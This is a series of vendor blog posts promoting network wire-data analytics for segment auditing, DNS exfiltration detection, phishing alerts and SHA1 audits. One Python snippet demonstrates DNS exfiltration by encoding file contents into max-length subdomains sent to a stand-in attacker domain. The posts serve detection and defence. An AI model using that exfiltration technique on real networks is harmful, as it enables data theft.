Well, let me start with one of my patented insufferable analogies. The fact that my city has a police department doesn't mean that I don't lock my door or that I am not vigilant about my own property. Sadly, the workloads, staff shortages and overall culture of today's enterprise have system owners worrying about everything BUT security. When I first moved into my neighborhood it was VERY sketchy, but I LOVED the old bungalow-style houses, and my wife and I decided to fix one up. Over the next few years, more people moved into the neighborhood who did not want to tolerate flop houses and crack houses, and eventually things got considerably better. Crime went down, property values went up, and an area that had been very costly to the city was now less costly and paying higher property taxes.

So what changed?
As I stated previously, people in my neighborhood made a conscious decision not to allow fringe activity to continue. When we saw people behaving suspiciously, we called the police and generally got involved in the security of our own neighborhood. Contrast this with a neighborhood 20 blocks south of me, where the relationship with law enforcement was strained. That neighborhood was less safe, cost the city more money and had considerably lower property values. I am not going to get into the reasons for the strained relationship with law enforcement (some legit, some not), but the point/parallel here is that the better your system owners' relationship is with the CISO's organization, the more functional and safer your CIDR block is going to be. You have to ask yourself what you have between you and security: a wall, a bridge, or a moat with alligators in it. As a federal employee, while I did not work for the OCISO, my group assigned a daily "pit boss" and we built a bridge between our team and our peers on the OCISO side.

Back in 2010, out of frustration with INFOSEC and the way it was functioning, I made the following statement on my Edgesight under the Hood blog: "Unless you can buy your INFOSEC team a crystal ball or get them an enterprise license to Dionne Warwick's Psychic Friends Network, system owners are going to HAVE to start taking some responsibility for their own security." Security teams cannot be responsible for knowing suspect behavior on systems that they don't oversee on a day-to-day basis. When we factor in things like phishing or credential stealing, we basically have a bad actor using approved, albeit stolen, credentials coming in over approved ports. If someone had stolen a key to my house, walked up to the front door, opened it and started leaving with my property, it would not look suspicious even if a cop were standing right there. When I chase them out of my house with a Mossberg, THAT looks suspicious. Sadly, once most systems are compromised, the last people to know are the actual system owners. At ExtraHop we pride ourselves on the visibility we provide both security teams AND system owners. As you evaluate solutions, think of how you can get system owners involved: include IT in the process of implementing them and make them a stakeholder.

Conclusion:
INFOSEC can be a lonely job; when I worked in IT security, generally the only friends I had in the organization were other security folks. A professional barrier with your IT colleagues is fine, but there doesn't need to be an air gap. In my old neighborhood, yes, the local police could end up needing to arrest me one day (luckily I have yet to ascend beyond the occasional "suspicious character" in the police blotter), but that professional barrier should not prevent me from working hand in hand with them as they work to protect me. The people who build, support and architect our digital products pay all of our salaries, including INFOSEC's. I think we need to ask ourselves whether there are any organizational air gaps between the CIO's and CISO's organizations, and what steps we can take to build bridges and ensure everyone is working together.

Most of the circles I run in are at the point of rolling their eyes when they hear me say "I can't tell you what the next big breach will be, other than that it will involve one host talking to another host it's not supposed to". One of the challenges I come across, even in the federal space occasionally, is that due to staff shortages, the system sprawl facilitated by virtualization, and the ridiculous workloads some operations teams carry, the ability to distill your security posture into who is talking to who is next to impossible. The top two of the SANS 20 Critical Controls are an inventory of authorized and unauthorized systems, and an inventory of the apps and software running on those systems. In our conversations with practitioners, these top two controls are consistently mentioned as being extremely difficult to wrangle. I believe some of this is due to the top-down nature of most security tools, which perform tasks like SNMP/ping sweeps or WMI sweeps. An individual looking to work in the dark will, if they are worth their salt, effectively ACL themselves off and hide from being discovered. The fix for this is wire data analytics, which does not depend on discovering data by having open ports or having a system respond. With ExtraHop's wire data analytics platform, if you have an IP address and you engage in a transaction with another host that ALSO has an IP address, you are pretty much made. We will see the port/protocol, IP, client and server of the conversation, as well as numerous performance metrics. When this is paired with Application Inspection Triggers, you are positioned to take back your enterprise and get control of those conversations you don't expect or don't know about. The type of stuff that keeps your CISO up at night.
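Distilling "who is talking to who" is, at its core, a small aggregation over flow tuples. A toy sketch (the flow records below are made up for illustration):

```python
from collections import Counter

# Hypothetical flow records observed on the wire: (client_ip, server_ip, protocol).
flows = [
    ("192.168.0.99", "74.121.138.36", "SSL:443"),
    ("192.168.0.99", "74.121.138.36", "SSL:443"),
    ("192.168.0.12", "10.1.3.5", "CIFS"),
    ("10.9.9.9", "203.0.113.7", "SSH:22"),
]

# Distill traffic into a who-talks-to-who inventory with transaction counts.
conversations = Counter(flows)
for (client, server, proto), count in conversations.most_common():
    print(f"{client:>14} -> {server:<14} {proto:<8} x{count}")
```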

Enter ExtraHop Segment Auditing:
Using the ExtraHop platform to audit critical segments of your infrastructure has a two-fold function. First, you are positioned to be alerted immediately when an unauthorized protocol or port has been accessed by a client, or when one of your servers in that segment has engaged in unauthorized traffic to Belarus or China. Second, it allows architecture, security and system owners to reclaim their enterprise by getting a grip on what the exact communication landscape looks like. As previously stated, the combination of staff turnover, system sprawl and workload has left teams with little to no time to spend auditing communications. With the ExtraHop platform as a fulcrum, much of the heavy lifting is already done, drastically reducing the analytics burden.

How it works:
Within the ExtraHop platform you create a device group, assign the template trigger to the device group (example: PCI), and edit a few simple variables that declare your expected communications. If a transaction falls outside the white list of expected/permitted communications, the Discover appliance will take action in the form of alerts, Slack updates, dashboard updates and Explorer (our search appliance) updates. The alerted team will have five minutes to investigate the incident before they receive another alert. The idea is that you investigate, then either white list or suppress transactions that are not allowed/expected. In doing so, you should have a full map of communications within an hour of deploying the trigger to an audited segment/environment.

Declare Expected Communications:
In the trigger we have one declared variable and three white lists that can be used to reduce alert fatigue as well as root out unauthorized transactions.

-segment: Sets the segment we are auditing; this is what will show up in the dashboard.

-proto_white_list: Sets the protocols that are approved for this specific device group.

-cidr_white_list: Sets the CIDR blocks you wish to ignore. I generally only use broadcast-type addressing here, as there are risks in white listing an entire CIDR block.

-combo_white_list: For this variable I use 24-bit blocks paired with a protocol. An example use of this white list: you need to alert on CIFS traffic but want to remove false positives for access to the sysvol share on your Active Directory controllers. If your AD environment lives on 10.1.3.0/24, then we would white list "10.1.3.0_CIFS", allowing us to continue monitoring for CIFS while not being alerted on normal Active Directory policy downloads.
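ExtraHop triggers run in the appliance's own trigger language, but the white-list evaluation they perform can be modeled in a few lines of Python. This is a hedged sketch of the logic only; the variable names come from the post, while the values and helper function are illustrative:

```python
import ipaddress

# Declarations mirroring the trigger variables described above (values illustrative).
segment = "PCI"
proto_white_list = {"SSL:443", "HTTP:80"}
cidr_white_list = [ipaddress.ip_network("10.255.255.0/24")]  # broadcast-type ranges only
combo_white_list = {"10.1.3.0_CIFS"}                         # e.g. AD sysvol over CIFS

def violates(client_ip: str, proto: str) -> bool:
    """Return True when a transaction falls outside the declared white lists."""
    addr = ipaddress.ip_address(client_ip)
    if proto in proto_white_list:
        return False
    if any(addr in net for net in cidr_white_list):
        return False
    # Check the client's 24-bit block paired with the protocol (combo white list).
    block_24 = ipaddress.ip_network(f"{client_ip}/24", strict=False).network_address
    if f"{block_24}_{proto}" in combo_white_list:
        return False
    return True

print(violates("10.1.3.44", "CIFS"))   # False: AD policy download, combo white-listed
print(violates("10.1.9.44", "CIFS"))   # True: CIFS from an unexpected block
```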

Below is a sample of the trigger used that you assign to each device group you would like to audit.

(Click Image)

This same trigger can also be edited to white list client-based activity (egress) as well as server-based activity (ingress).

Results:
The result is that you can methodically peel back the onion in the event a worm is infecting your systems. Additionally, you can systematically begin the process of understanding who is talking to who within your critical infrastructure. Below you see a dashboard that shows the unauthorized activity both as a server and as a client. You also have a ticker showing a count of the offending transactions, including the client/server/protocol/role, as well as a rate of protocol violations. Ideally, after a few hours of working out unexpected communications, you would expect this dashboard to be blank. Beyond the dashboards is where the real money is; let's talk about some of the potential workflows available leveraging the ExtraHop ODS feature and our partners.

(Click Image)

Possible Workflows:

Export results to Excel and ask system owners what the HELL is going on:
The ExtraHop platform includes a search appliance that allows you to export the results of the segmentation audit to a spreadsheet. This can be attached to an email to the system owners or CSIRT team to find out what is going on with those unauthorized transactions. In the search grid below, you see a mapping of all transactions that were not previously declared as safe.

(FYI, the “Other” protocol is typically tunnel based traffic such as ICMP or GRE)

(Click Image)

SIEM Integration:
The ODS feature of the ExtraHop platform can send protocol violations to your SIEM workflow. As most CSIRT responses are tied to some sort of SIEM, ExtraHop can thread wire data surveillance into those workflows seamlessly.

Slack updates:
If you have a distributed SECOPS team, or you want the flexibility of creating a Slack channel and assigning resources to watch it, the ability to leverage RESTful APIs for integration with other tools can greatly enhance the agility and effectiveness of your security incident response teams. Below you see an example of sending a link to the alert, or the actual alert itself, into a Slack channel. In our example above, if you are a member of the PCI team or on the governance side of the house (or both, for that matter), you can easily collaborate here. In the scenario below, the INFOSEC resource can actually chat with the system owner to find out if this is, in fact, suspicious activity. The majority of crimes that result in arrest do so because a citizen called the police and the two worked together to determine whether a crime had been committed. Sadly, this dynamic doesn't exist in IT today; we are creating it for you below (alerts are sent within a few milliseconds).
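For the curious, posting such an alert to Slack is a single JSON POST to an incoming webhook. The sketch below is illustrative, not the appliance's actual trigger code; the webhook URL and message format are assumptions:

```python
import json
from urllib import request

# Hypothetical incoming-webhook URL; Slack webhooks accept a JSON {"text": ...} POST.
SLACK_WEBHOOK = "https://hooks.slack.com/services/T000/B000/XXXX"

def build_alert(client: str, server: str, proto: str, segment: str) -> dict:
    """Format a protocol-violation message for the channel."""
    return {"text": f"[{segment}] unauthorized {proto}: {client} -> {server}"}

def send_alert(payload: dict) -> None:
    """POST the payload to the webhook (network call, so left commented below)."""
    req = request.Request(SLACK_WEBHOOK,
                          data=json.dumps(payload).encode(),
                          headers={"Content-Type": "application/json"})
    request.urlopen(req)

alert = build_alert("192.168.0.99", "203.0.113.7", "SSH:22", "PCI")
print(alert["text"])
# send_alert(alert)   # uncomment with a real webhook URL
```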

(Click Image)

Tetration Nation:
One big announcement at Cisco Live last week was the ExtraHop integration with Cisco's Tetration product. Below you see an example of how the ExtraHop platform handles a ransomware outbreak. The workflow for protocol violations is the same: should the Discover appliance observe unauthorized communications, the traffic can be tagged and sent to the Cisco security policy management engine, where policies can be enforced.

Conclusion:
One of the battle cries for security in 2017 has been the need to simplify security. Top-down device discovery simply does not work, and it leaves room for bad actors as well as insider threats to operate in the dark. A foundational security practice that includes passive device discovery provides the ground-up approach that lays the groundwork for a much more stable security practice. Distilling communications down to who is talking to who, and whether it is authorized, has been impossible for far too long. Leveraging ExtraHop's segment auditing capabilities positions you to know, within milliseconds, when a system is operating outside its pre-defined parameters. When coupled with ExtraHop Addy, you can obtain full-circle visibility 24×7.

A few days ago, SANS wrote an article about the importance of tracking DNS query length, stating emphatically that "Size Does Matter". It's an excellent article and certainly worth a read; you can find it here.

The article demonstrates how easy it is to exfiltrate a file over the DNS channel. They ran a script that encoded the /etc/passwd file into base32 chunks and exfiltrated the file to an external DNS server. Since a DNS label is limited to 63 characters, they used all 63 characters of each subdomain to carry an encoded text string, allowing them to push the data externally using the internal corporate DNS server as the mule in the process.
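To make the mechanics concrete, here is a hedged reconstruction of the encode-and-chunk step the article describes (the file contents and attacker domain below are made up): base32-encode the data, then split it into DNS labels of at most 63 characters.

```python
import base64

# Bytes to exfiltrate (inlined here so the sketch is self-contained).
data = b"root:x:0:0:root:/root:/bin/bash\n"

# Base32 keeps the payload within the DNS-legal character set.
encoded = base64.b32encode(data).decode().rstrip("=")

# DNS labels are limited to 63 characters, so chunk accordingly.
labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]

# Each chunk becomes a subdomain lookup routed out through the corporate resolver.
for n, label in enumerate(labels):
    print(f"{n}.{label}.attacker.example")
```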

Just before showing us the Splunk histograms, they did something VERY unique: they showed a tcpdump command.

As you are aware, tcpdump is a wire analysis sniffing tool that shows you packets as they are being observed on the wire. If ONLY there were a way to take action against this behavior as it was being observed on the wire. What if I told you there was one? And you probably didn’t even know you could leverage it in your security practice!

Enter Wire Data:
In a way, the SANS article provided a segue for me to demonstrate the power of wire data. The ExtraHop platform provides full, in-flight stream analysis and can interact with external APIs that may be able to actually STOP DNS exfiltration, instead of telling you it has already happened.

To run a similar test, I attempted to use base64 to exfiltrate a much larger file, called blockedIPs.txt, using a script named dnsjackassery.sh. I then used an online stopwatch to time the run from when I executed the script to when it finished. The entire text file was exfiltrated in 8.01 seconds. Basically, by the time the data is rendered in Splunk, it has already been exfiltrated. That doesn't mean the Splunk scenario isn't valuable, but leveraging wire data we can do A LOT more than just tell your SOC that it has been breached.

Below you see that the script was able to exfiltrate the entire file in 8.01 seconds.

So in looking at the time it took to exfiltrate the entire blockedIPs.txt file, 8.01 seconds isn't really a lot to work with, as your SOC does not have a crystal ball. BUT in the world of wire data analytics, where you deal in microseconds, seconds are hours! Below is a diagram of how we have set up the ExtraHop appliance to alert us when DNS exfiltration takes place. Since I don't have an active OpenDNS account, I am using the Slack API to demonstrate how the ExtraHop platform can integrate with intelligent services. For this test we set the following criteria using ExtraHop's Application Inspection Triggers:

DNS query length of 63 characters or greater

Not part of B2B partners' or internal namespaces

Not a common CDN like Akamai or amazonaws.com

There will always be SOME white listing needed to avoid digital collateral damage. If the site is a .ru, .cn or, in this case, a .be, and I am a hospital in Minneapolis, then I doubt I have an abundance of business with those namespaces, and I feel pretty comfortable bit-bucketing them via OpenDNS or another next-generation DNS product.
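The criteria above can be modeled in a few lines of Python. This is a sketch of the logic only, not the actual trigger; the white-list contents and domain names are illustrative:

```python
# White-list suffixes are illustrative; tune for your own B2B and CDN footprint.
white_list_suffixes = ("corp.example.com", "akamai.net", "amazonaws.com")

def suspicious(query_name: str) -> bool:
    """Flag DNS lookups that meet the exfiltration criteria listed above."""
    name = query_name.rstrip(".")
    # Criteria 2 and 3: skip internal namespaces and common CDNs.
    if name.endswith(white_list_suffixes):
        return False
    # Criterion 1: a label at the 63-character limit suggests an encoded payload.
    return any(len(label) >= 63 for label in name.split("."))

print(suspicious(("a" * 63) + ".evil.example"))   # True: max-length label, unknown domain
print(suspicious("ec2-1-2-3-4.amazonaws.com"))    # False: white-listed CDN suffix
```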

So upon executing the dnsjackassery.sh script we begin to see results populating our Slack channel within a few milliseconds. This could just as easily be an API call to your DNS service to “black hole” the suspect domain.

Transaction speed:
In the two images below, note the performance of the Slack transactions. You can see an average round-trip time of 41ms with an average processing time of 58ms. I would expect an API call to OpenDNS to be similarly fast, meaning you have plenty of time to stop a file from being fully transferred via DNS exfiltration. The point here is that, unlike many SIEM-based solutions, you are well positioned to counter-punch using ExtraHop and Wire Data Analytics.

Slack Performance Metrics: Taken from the ExtraHop Appliance

The article also made a point of suggesting that you monitor subdomain counts (they are one of the few to do that, tip of the hat to ya!). Using the ExtraHop platform, we also keep track of the number of subdomains by client/domain combo. If you look below, you see the number of lookups for a specific domain from a single IP. Unless it is a NATed address with a few hundred users behind it, it is a pretty safe bet that a large number of the metrics below are NOT human lookups but some sort of program doing them. Even the fastest internet users cannot perform more than a few DNS queries in a 30-second period.

Also noted in the SANS article was the need to pay attention to query lengths. Here we have written a trigger to give you the average query length by root domain. This metric, as well as the subdomain count, can be leveraged with an API to actually orchestrate a response via OpenDNS or another product.
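Both metrics reduce to simple aggregations over observed lookups. A toy sketch (the client/query data is made up, and the root-domain parsing is deliberately naive):

```python
from collections import defaultdict

# Hypothetical (client_ip, query_name) pairs observed on the wire.
lookups = [
    ("192.168.0.99", ("x" * 60) + ".evil.example"),
    ("192.168.0.99", ("y" * 61) + ".evil.example"),
    ("192.168.0.50", "www.extrahop.com"),
]

def root_domain(name: str) -> str:
    # Naive: last two labels. A production version would handle multi-part TLDs.
    return ".".join(name.split(".")[-2:])

subdomain_counts = defaultdict(int)   # lookups per client/root-domain combo
query_lengths = defaultdict(list)     # query lengths per root domain

for client, name in lookups:
    subdomain_counts[(client, root_domain(name))] += 1
    query_lengths[root_domain(name)].append(len(name))

for root, sizes in query_lengths.items():
    print(f"{root}: {sum(sizes) / len(sizes):.1f} avg query length")
```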

Conclusion:
There is a big push to add automation and orchestration to most security practices. This is more difficult than it sounds. In the case of DNS exfiltration, many SIEM-based products, while still quite valuable, lack the shutter speed to observe and react to DNS-based exfiltration. However, when you leverage the power of ExtraHop's Wire Data Analytics and the Open Data Stream (ODS) technology to orchestrate responses, the job becomes almost trivial. As I stated, in our world seconds are hours and minutes are days. The number of orchestration products hitting the cyber security market is going to make show floors look like a middle-school science fair, where practitioners feel like they are looking at a myriad of baking-soda volcanoes! Orchestration is only as good as the visibility integrated into it. Good visibility starts with wire data; good visibility starts with the ExtraHop platform.

*PS anyone running OpenDNS and familiar with the API, I’d LOVE to try counter punching using the techniques described here!!

In this post, we will couple ExtraHop's wire data analytics, Anomali STAXX (a leading threat intelligence solution) and Slack (a cloud-based collaboration platform) to demonstrate how we can use orchestration and automation in a manner that helps today's under-(wo)manned security teams meet today's threats with the agility needed!

I was fortunate enough to be selected to speak at RSAC 2017, and it was surely a career highlight for me. As several analysts pointed out post-show, automation and orchestration seemed to be the flavor of the year. Over the last 36 months it has become glaringly obvious that we simply cannot keep bad actors and malicious software off of our networks. I have been preaching the folly of perimeter-only security since 2010. The speed with which systems are now compromised, and the emergence of the "human vector" through phishing, has all but assured us that the horde is behind the wall and needs to be directly engaged. Reliance on logs and SIEM products will give you a forensic view of what is going on, but will do little against today's threats, where a system can be compromised by the time the log is written.

While the idea of automation and orchestration is a great one, there are issues with it, and this will not be the first time "self-defending networks" have been brought to market. Bruce Schneier makes a very good point on his "Schneier on Security" blog when he states the following:

"You can only automate what you're certain about, and there is still an enormous amount of uncertainty in cyber security." He also makes one of the greatest quotes in INFOSEC history when he states, "Data does not equal information, and information does not equal understanding."

Perhaps the battle here is to get to a place of certainty. I too was once an advocate of "log everything and sort it out later", but the process of sorting through the data became extremely tedious, and the amount of work it took to get to "certainty", I believe, gave bad actors time to operate while I wrote SQL queries, batch processes and parsing scripts for my context-starved data sets. Couple this with the fact that teams are digitally bludgeoned to death with alerts and warnings, and the "INFOSEC death sentence" starts to take root as people become desensitized to the alerts.

So where do we find certainty, and how do we use it?
While the industry is still developing, there have been great strides in threat intelligence. ISACs around the world are working together to build shared intelligence around specific threats and to make the information readily available via TAXII, STIX and CIF. There is even a confidence level associated with each record that we can use as a guide to determine whether a specific action is needed. The challenge with good threat intelligence is how we make it usable. Currently, most threat intel is leveraged in conjunction with a SIEM or logging product. While I certainly advocate for logs, there are some limitations with them:

Not everything logs properly (IoT systems normally have NO logging at all)

You have a data gravity issue (you have to move the data into the cloud to be evaluated, or store petabytes of data locally to evaluate it)

In some cases, only a small portion of the log is usable (but you pay to index the entire log with most platforms)

Their use is largely forensic against many of today's threats

The case for Wire Data Analytics:
The key difference I want to point out is that, using Wire Data Analytics with ExtraHop, you can perform quite a bit of analysis in flight. ExtraHop "takes" data off the wire and is not dependent on another system to "give" the data to it. The only prerequisite for ExtraHop is an IP address. Examples of how I have made a SIEM more effective using wire data include:

Reducing logging volume roughly 50-fold by counting logins per IP THEN sending a syslog message to the SIEM only for IPs with more than 100 logins, versus sending tens of thousands of logs per minute to the SIEM and checking on the back end

Checking an EGRESS transaction against threat intelligence THEN sending the syslog only if there is a match

In an enterprise with tens of thousands of employees, rather than logging EVERY failed login, aggregating records into five-minute increments, then sending those with more than 5 login failures to the SIEM
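The aggregate-then-forward pattern in these bullets reduces to a small amount of code. A minimal sketch (the threshold, window and data are illustrative; in production the print would be a syslog send, e.g. via logging.handlers.SysLogHandler):

```python
from collections import Counter

# Hypothetical five-minute window of failed-login source IPs seen on the wire.
window = ["10.0.0.5"] * 8 + ["10.0.0.6"] * 2 + ["10.0.0.7"] * 120

THRESHOLD = 5   # only escalate sources with more than 5 failures per window

def summarize(failures, threshold=THRESHOLD):
    """Collapse per-event noise into one summary record per offending IP."""
    return {ip: n for ip, n in Counter(failures).items() if n > threshold}

for ip, n in summarize(window).items():
    # One summary line per offender instead of one log per failed attempt.
    print(f"ALERT ip={ip} login_failures={n} window=5m")
```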

The point here is that you can deliver context when you leverage wire data analytics with your SIEM workflows. Using a SIEM alone, you must achieve context by aggregating the logs and looking at them after they are written. Using ExtraHop with your SIEM, you achieve context (and, more importantly, get closer to Mr. Schneier's certainty) BEFORE sending the data to the SIEM. You keep all the workflows tied to the incumbent SIEM system; you are just getting better, and fewer, logs. Should I disable an account that has 50 login failures in the last five minutes (locked out or not)…HELL YES! While I don't think automation and orchestration are a panacea, there are SOME cases where the certainty level is high enough to orchestrate a response. Also, I believe automation and orchestration are not just for responding; they can be used to make your SOC more effective.

Now that I have, hopefully, established the merits of using Wire Data Analytics, let's keep in mind that orchestration does NOT have to be a specific action or response. Orchestration can also be used to make your team more agile and, hopefully, more effective. Most security teams I come across have at least one, two, and in some cases three open positions. The fact is, at a time when threats are becoming more complex, finding people with the skills needed to confront them is harder than ever. The situation has gotten so bad that the other day I typed "Human Capital Crisis" into Google and it auto-filled "in cybersecurity". The job is getting tougher and there are fewer of us doing it. What I am going to show you in this post will never replace a human being, but it might ease some of the heavy lifting that goes into achieving situational awareness.

PHISHING: "PHUCK YOU, YOU PHISHING PHUCKS!!!"
Anyone who has ever been phished, or worked in an organization experiencing a phishing/spear-phishing campaign, has felt exactly as the section title says. Let's have a look at how we can help our security teams get better data by leveraging the APIs of three unique platforms to warn them when a known phishing site has been accessed.

For those of us working too hard to bring context to the deluge of data, my suggestion: get some REST!!! Below I walk you through how I can monitor activity to known phishing sites by doing a mash-up of three technologies using the RESTful API of each platform.

Solution Roster:

ExtraHop Discovery/Explorer appliance
ExtraHop provides wire data analytics and surveillance by working from a mirror of the traffic. Think of it as a CCTV for packets/transactions.

Anomali STAXX Virtual Machine
Anomali STAXX provides me lists of current threat intelligence. Think of this as equipping the CCTV operator with a list of suspicious characters to look for.

Slack Collaboration Community
Slack provides me a community at packetjockey.slack.com where my #virtualsoc team operates from anywhere in the world.

A Python peer (Windows or Linux)
This is the peer system that pulls the threat intelligence off of the STAXX system and uploads it to the ExtraHop appliance.

How it works:
As you can see in the drawing below, the Linux peer uses the REST API to get a list of known phishing sites, then executes a Python script to upload the data into the memcache on the ExtraHop appliance, equipping it with the threat intelligence it needs. The ExtraHop appliance uses an Application Inspection Trigger that checks every outgoing URI to see if it is a known phishing site. If there is a match, an alert is sent to Slack and email/SMS, in addition to being logged on the internal dashboards and search appliance.
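The upload step can be sketched against the appliance's memcache-compatible interface using the standard memcached text protocol. To be clear, the host, port and "phish_url:" key scheme below are assumptions for illustration; check your appliance's open data context configuration for the real values:

```python
import socket

# Assumptions: the appliance exposes a memcached-compatible session-table
# interface at EH_HOST:EH_PORT, and the inspection trigger looks up keys
# named "phish_url:<hostname>". All three are illustrative.
EH_HOST, EH_PORT = "extrahop.example", 15001

def set_command(key: str, value: str, ttl: int = 3600) -> bytes:
    """Build one memcached text-protocol SET command."""
    data = value.encode()
    return f"set {key} 0 {ttl} {len(data)}\r\n".encode() + data + b"\r\n"

def push_indicators(urls):
    """Open one connection and push every phishing indicator as a key."""
    with socket.create_connection((EH_HOST, EH_PORT)) as sock:
        for url in urls:
            sock.sendall(set_command(f"phish_url:{url}", "1"))
            assert sock.recv(64).strip() == b"STORED"

# indicators = pull_from_staxx()   # hypothetical: fetched via the STAXX REST API
# push_indicators(indicators)
print(set_command("phish_url:badsite.example", "1"))
```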

Click Image

What the final product looks like:
From my Linux box (I don't dare go to these sites on my Windows or Mac laptop), I do a wget on one of the known phishing sites, and within milliseconds (yes, milliseconds, watch the video if you don't believe me) we get the client IP, server IP and the site that was visited. From here we can find out who owns that client machine and get them to change their password immediately, as well as issue an ACL for the server in case this is a spear-phishing campaign targeting specific users. Also, before you ask: "Yes", we can import the list of known malicious email addresses and monitor key executive recipients in case one of them gets an email from a known malicious address. We can also check HTTP referrers against the phish_url threat intelligence.

In the screenshot below, you see my "wget" command and its result at 11:23:53, and the Slack warning coming in at 11:26. If you watch the video you will see it takes milliseconds.

I believe that by using Slack you can also color-code certain messages and program in that awesome "WTF" emoji (if one exists) for specific messages ExtraHop sends. Also, if you are not comfortable with specific information being sent to Slack, we can configure the appliance to send you a link to the LOCAL URI that ONLY you and your team can access.

Conclusion: While there is a lot of buzz around orchestration and automation, I believe the pessimism around it is justified. Security teams have been promised a lot over the last few years, and what we have found, especially lately, is that a lot of tried-and-true solutions lack either the shutter speed or the context to be effective. Here we are doing some orchestration and automation, but we are doing so in order to give the HUMAN BEING better information. Our security director made a very good point to me the other day when he said the last thing a security team wants is more data. What we have hopefully shown in this post is that if you have open platforms like Anomali, Slack, and ExtraHop, you can craft an automation and orchestration solution that actively helps security teams while still leveraging the nuance and judgment that only exists in a human being.

While there will be solutions that automatically block certain traffic, issue ACLs, disable accounts, etc., we can also use automation to do some of the heavy lifting for today's out(wo)manned security teams. Getting where I think the cyber security space needs to be is going to take more than one product/tool/platform. If you have a solution that is closed and does not support any kind of RESTful API or open architecture, unless it fulfills a specific niche, get rid of it. If you are a vendor selling a closed solution, do so at your own peril, as I believe closed systems are destined to go the way of the dinosaur. By leveraging wire data with existing workflows, you can drastically reduce your TTWTF (time to WTF!??) and be better positioned to trade punches with tomorrow's threats.

Not exactly new news here, but in case you have been in a coma the last two weeks: Google managed to engineer a successful SHA1 collision attack and intends to release the source code on or around May 24th. According to BusinessWire.com, 21% of websites are still using SHA1 certificates. Basically, over 1/5 of the sites on the internet are using a woefully weak hashing algorithm, and if they are still doing so near the end of May, they will be doing so with the source code for how to exploit them out in the open.

A colleague of mine once told me, as I was lamenting my frustration at apathy in the enterprise, "Sheep hate the sheep dog more than the wolf." In this case, I see it more as a matter of the sheep dog being so fed up that he or she is basically warning the flock that they will not only be left behind, but that the wolves will be told how to get at them. You may or may not agree with this methodology, but regardless, those who do not heed the warning and fall in with the rest of the flock may find themselves being part of the thinning of the herd as, most assuredly, the wolves will gather.

One of the challenges in many enterprises is understanding what your exposure is. There are tools that will let you scan systems, but the problem is two-fold: you could spend hundreds of hours securing your own servers only to be breached through a B2B partner or an IoT device that has a weak cipher. While over 1/5 of the internet is still using SHA1, I am betting that internally it is much worse. If we have learned anything over the last 36 months, it's that the perimeter won't keep folks out, and while the wolves may gather in the DMZ, they will work just as easily in the dark when Fred in payroll opens that email attachment or clicks that picture. As enterprise folks, we own the responsibility for thinning our own flock and keeping our own strays in line.

You may be wondering how you can audit this internally, externally, and across B2B partners. It may not go over well if you called your B2B partners and told them you were going to start scanning their systems. A solution that allows you to engage in careful surveillance of all SSL transactions and determine the cipher suites used positions you to determine your entire exposure without scanning or crawling your own or anyone else's network. Using ExtraHop's wire data analytics, you can observe your SSL transactions and start the process of paying down technical debt by fixing the issues one system, network, and B2B partner at a time.
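As a minimal sketch of the kind of tally this passive surveillance enables, the snippet below groups mock SSL transaction records by server and counts the ones signed with SHA1. The field names and addresses are illustrative assumptions, not ExtraHop's actual record schema.

```python
from collections import Counter

# Mock SSL transaction records as they might be observed on the wire.
# The 'server' and 'signature' fields are illustrative, not ExtraHop's schema.
records = [
    {'server': '10.0.0.5',    'signature': 'sha1WithRSAEncryption'},
    {'server': '10.0.0.5',    'signature': 'sha1WithRSAEncryption'},
    {'server': '10.0.0.9',    'signature': 'sha256WithRSAEncryption'},
    {'server': '203.0.113.7', 'signature': 'sha1WithRSAEncryption'},
]

# Tally SHA1-signed transactions by server to see where the exposure sits
sha1_by_server = Counter(
    r['server'] for r in records if 'sha1' in r['signature'].lower()
)
for server, count in sha1_by_server.most_common():
    print(server, count)
```

Because the records come off a mirror of the traffic, this kind of audit covers internal systems and B2B partners alike without ever touching their hosts.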

From the same article cited above, getting visibility into what your exposure is can be difficult:

“The results of our most recent analysis are not surprising” said Kevin Bocek, chief security strategist for Venafi. “Even though most organizations have worked hard to migrate away from SHA-1, they don’t have the visibility and automation necessary to complete the transition. We’ve seen this problem before when organizations had a difficult time making coordinated changes to keys and certificates in response to Heartbleed, and unfortunately I’m sure we are going to see it again.”

If you leverage our wire data analytics platform you can easily audit your exposure by using one of our canned reports on Cipher auditing or set up a quick trigger to audit it yourself.

How it works: ExtraHop sits back passively and observes network traffic via a mirror (tap, SPAN, etc.). Within this Application Inspection Trigger I am doing the following:

Checking to see if the certificate signature has "SHA1" anywhere.

If it does, I write the record to our EXA appliance, where I can get a quick look at what my exposure to SHA1 is from both clients and servers. I can also see who issued the weak certificate (be ready to call your IoT vendors and shrink-wrapped software vendors).

Click Image:
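The two steps above can be sketched in Python. Again, the real trigger is JavaScript running on the appliance, so treat this as an illustration of the logic only; the record fields below are hypothetical, not ExtraHop's schema.

```python
def sha1_audit_record(server_ip, client_ip, signature, issuer):
    """Return an audit record if the certificate signature mentions SHA1,
    else None. Field names are illustrative; the real trigger writes to
    the EXA using ExtraHop's own record format."""
    if 'sha1' not in signature.lower():
        return None  # strong signature: nothing to audit
    return {
        'record_type': 'SHA1 Audit',
        'server_ip': server_ip,
        'client_ip': client_ip,
        'signature': signature,
        'issuer': issuer,   # who issued the weak certificate
    }

rec = sha1_audit_record('10.1.2.3', '192.168.0.99',
                        'sha1WithRSAEncryption', 'Example IoT Vendor CA')
print(rec is not None)  # True: SHA1 in use, a record would be written
```

The substring check is deliberately loose so it catches any signature algorithm name that embeds "SHA1" (e.g. "sha1WithRSAEncryption"), regardless of case.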

Once we have started writing the information to the ExtraHop Explorer Appliance (EXA), we can get an idea of what our exposure is in two clicks (after allowing sufficient time to build the data set).

Click 1: Select “SHA1 Audit” from the Record Type combo box.

Click Image:

Click 2: In the "Group By" combo box, select "Server IP Address".
Below you see a list of every server using SHA1. Some of them are internet servers and some are internal systems. If we want, we can separate out the internal systems within the trigger using the .isRFC1918 function and look only at our internal systems.

Click Image:

Conclusion: Over the next two months, it will be important that we are able to determine our exposure to SHA1, not only for the servers we have on the internet, but internally and within the cloud providers we use. Moore's law dictates that the hardware and computing power needed to break cipher suites will continue to get better and cheaper. SHA1 had a run of over 20 years (although it has been considered weak for the last few years); cipher suites becoming obsolete is part of the digital cycle of life. It took me a few minutes to write the trigger you see here, and we already have canned auditing tools in the ExtraHop bundle gallery.

Getting visibility this quickly and getting an idea of our risk as easily as this is why we “wire data”.